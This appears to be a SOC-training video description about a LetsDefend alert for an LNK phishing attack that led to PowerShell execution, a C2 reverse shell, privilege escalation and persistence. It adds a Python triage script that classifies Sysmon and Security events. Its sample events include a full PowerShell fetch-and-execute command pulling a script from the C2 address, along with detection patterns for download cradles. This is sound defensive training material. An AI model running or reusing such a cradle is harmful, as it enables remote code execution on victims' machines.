ZDI-CAN-25373 Windows LNK Exploit Phish → PowerShell Reverse Shell → Persistence | LetsDefend SOC339

Published: 16 May 2026
on channel: InkSec

Day 112 of Becoming a SOC Analyst — SOC339 ZDI-CAN-25373 Windows Shortcut Exploit Detected (True Positive — Active Compromise)
A user on host Cooper (172.16.17.217) opened 2025AnnualReport.lnk, delivered by a phishing email from [email protected]. The shortcut launched PowerShell with an execution policy bypass that pulled the stage 2 payload MBS.ps1 directly from the C2 at 18.223.186.129:4444. Post-execution logs confirmed that the Helpdesk account was added to both the Administrators and Remote Desktop Users groups, that a reverse shell was established back to the C2, and that persistence was written via the PowerShell startup profile: a hands-on-keyboard intrusion with privilege escalation and the groundwork for RDP lateral movement. Full remediation completed: LNK and zip removed, startup profile deleted, Helpdesk account stripped of the elevated groups, endpoint contained.
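The chain above (explorer.exe spawning PowerShell with an execution policy bypass and a download cradle, an outbound connection to the C2 port, 4732 group additions to Administrators / Remote Desktop Users, and a profile.ps1 write) is exactly what a SIEM correlation rule should stitch together. The script below is an added example, not code from the video or from LetsDefend: it walks a list of constructed Sysmon and Security events, tags each one with a kill-chain stage, and returns a per-host verdict. The host name and C2 address come from the scenario; the event field names are assumed to mirror Sysmon/Security EventData (real SIEM exports differ), and the command line, user name and file paths in the sample events are constructed for illustration.

```python
"""Triage helper for the LNK -> PowerShell bypass -> C2 -> persistence chain.

Added example; not part of the original video or the LetsDefend scenario.
Event shape is an assumption: {"Computer", "EventID", "EventData": {...}}
with EventData keys borrowed from Sysmon and the Security log.
"""
import re
from collections import defaultdict

C2_IP = "18.223.186.129"          # from the scenario
C2_PORT = 4444                    # from the scenario
PROCESS_CREATE, NETWORK_CONNECT, FILE_CREATE = 1, 3, 11   # Sysmon event IDs
GROUP_MEMBER_ADDED = 4732                                 # Security log: member added to local group

# Well-known SIDs; matching on the SID avoids localised group names
ELEVATED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}

EP_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
PROFILE_PATH = re.compile(
    r"\\WindowsPowerShell\\(?:Microsoft\.PowerShell_)?profile\.ps1$", re.I)


def classify(event):
    """Return a list of (stage, detail) hits for one event; [] if uninteresting."""
    eid, d = event["EventID"], event["EventData"]
    if eid == PROCESS_CREATE:
        image = d.get("Image", "").lower()
        parent = d.get("ParentImage", "").lower()
        cmd = d.get("CommandLine", "")
        if not image.endswith("powershell.exe") or not EP_BYPASS.search(cmd):
            return []
        hits = []
        if parent.endswith("explorer.exe"):   # user double-clicked something (LNK pattern)
            hits.append(("initial_execution",
                         f"PowerShell with execution-policy bypass from explorer.exe: {cmd}"))
        if C2_IP in cmd or DOWNLOAD_CRADLE.search(cmd):
            hits.append(("stage2_download", f"download cradle in command line: {cmd}"))
        return hits or [("suspicious_powershell", cmd)]
    if eid == NETWORK_CONNECT:
        if d.get("DestinationIp") == C2_IP and int(d.get("DestinationPort", 0)) == C2_PORT:
            return [("c2_connection", f"{d.get('Image')} -> {C2_IP}:{C2_PORT}")]
        return []
    if eid == GROUP_MEMBER_ADDED:
        group = ELEVATED_GROUPS.get(d.get("TargetSid"))
        if group:
            return [("privilege_escalation",
                     f"{d.get('MemberName')} added to {group} by {d.get('SubjectUserName')}")]
        return []
    if eid == FILE_CREATE:
        if PROFILE_PATH.search(d.get("TargetFilename", "")):
            return [("persistence",
                     f"PowerShell profile written: {d['TargetFilename']} by {d.get('Image')}")]
        return []
    return []


def triage(events):
    """Group hits per host: {host: {stage: [detail, ...]}}."""
    findings = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for stage, detail in classify(ev):
            findings[ev["Computer"]][stage].append(detail)
    return {host: dict(stages) for host, stages in findings.items()}


def verdict(host_findings):
    """Turn a host's stage map into an analyst verdict string."""
    stages = set(host_findings)
    if "initial_execution" in stages and stages & {"c2_connection", "stage2_download"}:
        if stages & {"privilege_escalation", "persistence"}:
            return "True Positive - Active Compromise (post-exploitation observed)"
        return "True Positive - payload executed, no post-exploitation seen yet"
    if stages:
        return "Suspicious - needs analyst review"
    return "No findings"


HOST = "Cooper"   # 172.16.17.217 in the scenario
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry; command line and paths are illustrative
    {"Computer": HOST, "EventID": 1, "EventData": {
        "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
                       "-Command \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://18.223.186.129:4444/MBS.ps1')\""}},
    {"Computer": HOST, "EventID": 3, "EventData": {
        "Image": PS, "DestinationIp": "18.223.186.129", "DestinationPort": "4444"}},
    {"Computer": HOST, "EventID": 4732, "EventData": {
        "SubjectUserName": "user", "MemberName": "Helpdesk",
        "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544"}},
    {"Computer": HOST, "EventID": 4732, "EventData": {
        "SubjectUserName": "user", "MemberName": "Helpdesk",
        "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555"}},
    {"Computer": HOST, "EventID": 11, "EventData": {
        "Image": PS,
        "TargetFilename": r"C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1"}},
    # benign noise that must not fire: a service-launched script and a non-elevated group change
    {"Computer": HOST, "EventID": 1, "EventData": {
        "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\cleanup.ps1"}},
    {"Computer": HOST, "EventID": 4732, "EventData": {
        "SubjectUserName": "admin", "MemberName": "Helpdesk",
        "TargetUserName": "Users", "TargetSid": "S-1-5-32-545"}},
]

if __name__ == "__main__":
    for host, stages in triage(SAMPLE_EVENTS).items():
        print(host, "->", verdict(stages))
        for stage, details in stages.items():
            for detail in details:
                print(f"  [{stage}] {detail}")
```

Matching 4732 on the group SID rather than the display name keeps the rule working on non-English builds, and keying the network match on the C2 port as well as the IP is what separates the reverse shell from the earlier payload fetch when both hit the same host; in a real SIEM the same logic would be written as a correlation rule with a time window per host.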
🔬 Analysis Reports
🧪 Hybrid Analysis → https://hybrid-analysis.com/sample/6f...
🦠 VirusTotal → https://www.virustotal.com/gui/file/6...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #LNKExploit #WindowsShortcut #PowerShell #ReverseShell #PrivilegeEscalation #IncidentResponse #SIEM #Day112 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity